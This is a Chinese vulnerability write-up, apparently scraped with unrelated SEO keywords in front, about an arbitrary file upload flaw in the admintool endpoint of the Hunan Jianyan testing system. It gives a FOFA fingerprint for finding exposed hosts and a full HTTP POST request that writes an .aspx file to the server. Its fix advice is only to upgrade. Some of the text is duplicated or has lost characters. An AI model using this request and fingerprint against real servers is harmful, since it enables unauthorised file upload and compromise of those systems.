石家庄定制网站建设多少钱,饿了么网站怎么做的,哪些网站是用响应式布局做的,智慧团建密码格式是几位文章目录 前言声明一、漏洞详情二、影响版本三、漏洞复现四、修复建议 前言
湖南建研检测系统 admintool接口任意文件上传漏洞#xff0c;攻击者可通过该漏洞获取服务器敏感信息。 声明
请勿利用文章内的相关技术从事非法测试#xff0c;由于传播、利用此文所提供的信息或者… 文章目录 前言声明一、漏洞详情二、影响版本三、漏洞复现四、修复建议 前言
湖南建研检测系统 admintool接口任意文件上传漏洞攻击者可通过该漏洞获取服务器敏感信息。 声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。 一、漏洞详情
本检测信息管理系统能够实现检验工作的计算机化和网络化管理基本实现检测数据的自动采集 确保检验数据的公正性、科学性和准确性确保检验报告的规范性和权威性确保检验工作的高效率和服务的及时性 admintool 接口存在任意文件上传漏洞。
二、影响版本
湖南建研-检测系统 三、漏洞复现
FOFA: body/Content/Theme/Standard/webSite/login.css
上传文件数据包
POST /Scripts/admintool?typeupdatefile HTTP/1.1
Host: ip:host
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 41
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, brfilePathlog.aspxfileContentabc访问上传路径
四、修复建议
升级至最新版本
